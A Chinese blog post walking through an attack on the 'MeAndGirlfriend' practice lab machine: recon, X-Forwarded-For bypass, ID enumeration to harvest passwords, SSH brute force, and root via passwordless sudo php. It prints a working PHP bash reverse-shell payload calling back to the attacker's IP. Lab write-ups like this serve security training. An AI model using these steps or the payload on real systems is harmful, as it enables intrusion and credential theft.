MeAndGirlfriend攻方思路

最新推荐文章于 2024-09-18 19:04:21 发布
最新推荐文章于 2024-09-18 19:04:21 发布
阅读量74 收藏 1
点赞数 3
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhx836161547/article/details/128444301
版权

目录

这篇博客记录在写靶场meandgirlfriend的一些流程,这篇是以攻击者的视角去进行的

一、信息收集

1.获取IP

netdiscover

结果如下:
在这里插入图片描述
搜集到IP地址为192.168.43.145

2.扫描端口

namp -p- -T5 192.168.43.143

结果如下
在这里插入图片描述
22端口:存在远程服务器连接
80端口:存在web页面

二、获取shell

1.web测试

访问web页面:
在这里插入图片描述

提示我们只能从当地去访问,我们查看网页源代码发现

在这里插入图片描述

提示我们去了解使用一下x-forwarded-for,我们去了解一下
X-Forwarded-For简介
通过这篇CSDN博客,我们能够简单的了解到x-forwarded-for的含义以及利用方法
如图抓包加上这句话
在这里插入图片描述
放回抓的包,我们刷新页面即可成功访问目标登陆页面
在这里插入图片描述
根据功能显示,我们先去注册一个账号然后用注册的账号去登录
在这里插入图片描述
如图登录成功后,我们发现profile页面能够看到账户名等信息,我们右键改变html的元素来让password显现
在这里插入图片描述
成功看到密码,我们观察URL栏的user_id,可能存在越权漏洞,我们试着将数字改为其它,先改为1然后同样步骤去观察用户的信息
在这里插入图片描述
我们用bp的爆破模块去遍历id号,如图设置
在这里插入图片描述
用bp的模块爆破发现只有id1~5和id9有值,我们用同样的方法去一个个记录下用户名和其对应的密码

2.SSH爆破

用我们刚才拿到的账户名和密码利用超级弱口令工具去爆破SSH
在这里插入图片描述
如图成功爆破,我们用finashell去连接SSH即可拿到shell
在这里插入图片描述

三.提权

我们将kali上面的提权检查脚本上传到靶机上去运行
先在kali上开一个服务去供靶机下载程序

python2 -m SimpleHTTPServer 5566

然后去靶机上下载文件并赋予权限

wget http://192.168.43.129:5566/LinEnum.sh
chmod 777 LinEnum.sh

开始执行
在这里插入图片描述
如图发现提权突破点
在这里插入图片描述
可知我们在执行php命令的时候sudo不需要密码,我们用vim写一个php脚本

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.43.129/10086 0>&1'")
?>

保存文件为1.php
kali开启监听端口

nc -lvvp 10086

然后在靶机上运行脚本

sudo php 1.php

成功拿到shell
在这里插入图片描述
由于我们在执行php脚本的时候是以root权限去执行的,因此我们得到的shell是root权限
最后在/root下发现flag文件
在这里插入图片描述

总结

①有SSH的时候我们要想办法看是否能够连接到它的服务器shell
②提权的时候可以利用脚本来检测有哪些点可以利用

IDgoodis
关注
专栏目录
MeAndGrilfried蓝方应急响应
xhx836161547的博客
12-27 123
MeAndGrilfriend应急响应
Linux 命令
m0_74064008的博客
09-18 736
tar -cvf archive.tar /path/to/dir # 创建 tar 包。zip archive.zip file1 file2 # 创建 zip 压缩包。find /path -name "*.txt" # 查找所有 .txt 文件。tail -n 20 file.txt # 显示最后20行。head -n 20 file.txt # 显示前20行。gunzip file.txt.gz # 解压 `.gz` 文件。
集群聊天服务器项目【C++】(四)cmake介绍和简单使用
xaiobai123的博客
09-15 514
本章介绍了为什么使用cmake:比手写Makefile简单,cmake安装、vscode配置,以及用cmake编译上一章的代码。但是对于一个复杂的项目,使用cmake还需要其他额外的配置,后面会再详细介绍。
Linux5-echo,>,tail
2301_80339607的博客
09-15 600
选项-f,例如tail -f test.txt,实时跟踪(如果添加数据,这里立即显示,如果要退出追踪,按Ctrl+c)例如:echo "hello world",输出hello world。选项-num,例如tail -5 test.txt,查看末尾5行。echo 'pwd',输出pwd的位置。tail用于查看末尾内容,默认为末尾10行。echo是输出命令,类似printf。例如:tail test.txt。>指把左边内容覆盖到右边。>>把左边内容追加到右边。2.重定向符> >>
.NET 使用 HttpClient 发送请求时指定服务器 IP 地址
playis的博客
09-16 264
但我们只想请求192.168.1.1 时。当一个域名 china.cn。
如何进行IP清洗
KookeeyLena3的博客
09-12 1009
在数据抓取、网络爬虫或网络营销等活动中,IP地址的清洗是一个至关重要的环节。IP清洗旨在移除无效、受污染或可能引发问题的IP地址,从而提高网络活动的效率和安全性。本文将详细介绍如何进行IP清洗,包括识别问题IP、选择清洗工具、执行清洗过程以及后续的监控与维护。
香港服务器PING测试有什么作用?
YOKEhn的博客
09-18 307
测量服务器的响应时间:通过PING测试可以测量服务器的响应时间,即向服务器发送一个数据包并等待服务器返回数据包的时间,从而评估服务器的响应速度。比较不同服务器网络性能:如果你在选择香港服务器供应商或不同的服务器时,可以通过PING测试来比较它们的网络性能,选择响应时间更快、网络更稳定的服务器。PING测试是一种常用的网络诊断工具,用于测试计算机与服务器之间的网络连通性和响应时间。测试网络连接质量:PING测试可以帮助用户测试网络连接的质量,如网络延迟、丢包率等,从而帮助用户评估网络连接的稳定性和性能。
【STM32】esp8266通过MQTT连接服务器|订阅发布
yyqzjw的博客
09-15 570
该协议为应用层协议,传输层使用的是tcp,MQTT的订阅和发布,就相当于在抖音中你关注了某个领域的博主(订阅),如果有其他人发了作品就会推给你(发布),默认已经安装好了简单演示订阅mosquitto_sub 订阅指令-h 主机ip-p 端口号1883-t 主题发布mosquitto_pub 发布指令。
拥控算法BBR入门1
wangkai6666的博客
09-17 1004
一个TCP会话使用的拥塞控制算法只与本地有关。两个TCP系统可以在TCP会话的两端使用不同的拥塞控制算法。
统信服务器操作系统【d版字符系统升级到dde图形化】配置方法
RZer的博客
09-16 994
统信服务器操作系统d版本上由字符系统升级到 dde 桌面系统的过程
linux-安全管理-用户认证
Flying_Fish_roe的博客
09-17 1351
用户认证是 Linux 安全管理的核心,通过用户名/密码、SSH 密钥、PAM 和双因素认证等机制,管理员可以确保系统的安全访问。同时,合理的用户和权限管理,以及日志审计等措施,能够有效提升系统的安全性。确保密码策略的强度和安全性。使用 SSH 密钥认证代替密码认证。启用双因素认证以增强用户身份验证。定期审计系统日志,及时发现潜在的安全风险。
十四,在Spring Boot当中对应“ Tomcat 服务器的相关配置”和“服务器的切换”的详细说明
weixin_61635597的博客
09-15 1205
Spring Boot 支持的 webServlet: Tomcat,Jetty,or Undertow。Spring Boot 应用启动的是 Web 应用时,web场景包-导入 tomcat支持 Tomcat (也可以是Jetty,Undertow)的配置和切换。“在这个最后的篇章中,我要表达我对每一位读者的感激之情。你们的关注和回复是我创作的动力源泉,我从你们身上吸取了无尽的灵感与勇气。我会将你们的鼓励留在心底,继续在其他的领域奋斗。
浪潮信息首推3秒智能控温!告别服务器开机噪音
fanxiaohui12138的博客
09-15 762
在当前的数据中心运维实践中,运维人员在部署服务器时常被“飞机起飞”般的开机噪音所困扰。服务器刚刚接通电源,其内部元件尚处于预热待命状态,而风扇却已全速运转,这不仅加剧了噪音污染,还拖慢了启动速度,有时开机甚至需要数分钟之久,严重制约了运维效率。
Linux 文件系统(上)
2201_75663820的博客
09-18 1004
进程和文件的关系、重定向、缓冲区 ...
统信服务器操作系统【d版系统上Ansible工具】配置方法
RZer的博客
09-18 962
在统信服务器操作系统d版本上进行安装Ansible工具的方法以及配置方法。
SYN Flood攻击原理,SYN Cookie算法
携手驰网小林一同探索拥有一台服务器可以做哪些很酷的事情吧~
09-18 407
SYN Flood攻击是一种典型的拒绝服务(Denial of Service)攻击。所谓的拒绝服务攻击就是通过进行攻击,使受害主机或网络不能提供良好的服务,从而间接达到攻击的目的。SYN Flood攻击利用的是IPv4中TCP协议的三次握手(Three-Way Handshake)过程进行的攻击。TCP服务器收到TCP SYN request包时,在发送TCP SYN + ACK包回客户机前,TCP服务器要先分配好一个数据区专门服务于这个即将形成的TCP连接。
RK3568部署DOCKER启动服务器失败解决办法
shjhuang的专栏
09-15 291
RK3568部署DOCKER启动服务器失败解决办法
通过 Docker 部署 WordPress 服务器
shelby_loo的博客
09-15 744
Docker是一个开源平台,允许开发者将应用程序及其依赖项打包成一个容器。容器便于在不同环境中快速部署,而且隔离性强,避免了“在我电脑上可以运行”的尴尬。WordPress是一个流行的内容管理系统(CMS),以其易用性和强大的插件生态闻名。结合Docker,我们可以快速搭建一个灵活且可扩展的WordPress环境。通过以上步骤,我们成功地在三丰云的免费服务器上使用Docker部署了WordPress。这样的配置不仅快速,还方便进行后续的扩展和维护。如果你也想尝试一下,别犹豫,快来体验吧!
CentOS 上配置多服务器 SSH 免密登录
最新发布
Climbman的博客
09-18 394
如果有多台服务器需要互相免密登录,可以在每台服务器上重复上述步骤,确保每台服务器都有自己的密钥对,并且将其他服务器的公钥复制到自己的 ~/.ssh/authorized_keys 文件中。其中 user 是服务器 B 上的用户名,serverB_ip 是服务器 B 的 IP 地址。这将在 ~/.ssh/ 目录下生成私钥 id_rsa 和公钥 id_rsa.pub。假设有服务器 A 和服务器 B,需要从服务器 A 免密登录到服务器 B。二、在服务器 A 上生成密钥对。三、将公钥复制到服务器 B。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值